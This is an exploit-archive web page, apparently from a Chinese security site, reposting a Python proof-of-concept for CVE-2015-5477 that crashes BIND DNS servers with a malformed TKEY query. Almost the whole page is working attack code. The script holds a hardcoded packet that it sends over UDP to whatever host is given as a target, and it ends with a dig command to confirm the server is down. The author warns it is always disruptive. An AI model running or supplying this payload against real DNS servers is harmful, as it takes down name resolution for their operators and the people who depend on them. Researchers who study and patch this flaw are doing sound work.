首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BIND TKEY Query Denial Of Service
来源:serdat5[at]gmail[dot]com 作者:Corsini 发布时间:2015-08-06  
#!/usr/bin/python
# Title: BIND  Remote DoS via TKEY queries
# aka: DNS TKEY Query of Death
# Author: Lorenzo Corsini <serdat>
# E-Mail: serdat5[at]gmail[dot]com
# Twitter: https://twitter.com/serdat5tm

# References:
# https://kb.isc.org/article/AA-01272
# https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/

# Warning there is no way to use this PoC in a non-desruptive manner. 
# Use with care. I'm not responsible for what you'll do with that

import socket
import sys

#Not randomized.
DNS_PACKET='\x04X\x00\x80\x00\x01\x00\x01\x00\x00\x00\x01\x03xxx\x00\x00\xf9\x00\xff\x03xxx\x00\x00\xf9\x00\xff\x00\x00\x00\x00\x00%\x03xxx\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x00\x00\x03xxx\x00\x00\x10\x00\xff\x00\x00\x00\x00\x00%$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'

try:
  HOST=sys.argv[1]
  PORT= 53
except:
  print "Usage: %s host_to_crash" & sys.argv[0]
  sys.exit(-1)

print "Exploiting target at %s" % HOST

s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.sendto(DNS_PACKET,(HOST,PORT))
s.close()

print "Check Manually if the exploit worked... try launching:"
print "dig @%s CR4SH3D any" % HOST

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dell Netvault Backup 10.0.1.24
·Heroes Of Might And Magic III
·ISC BIND9 TKEY Remote DoS PoC
·Acunetix Web Vulnerability Sca
·Linux Privilege Escalation Due
·Brasero - Crash Proof Of Conce
·BIND9 - TKEY PoC
·Classic FTP 2.36 - CWD Reconne
·T-Mobile Internet Manager - Co
·MS14-002 Windows NDProxy Privi
·KMPlayer 3.9.x - .srt Crash Po
·FileZilla Client 2.2.x SEH Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved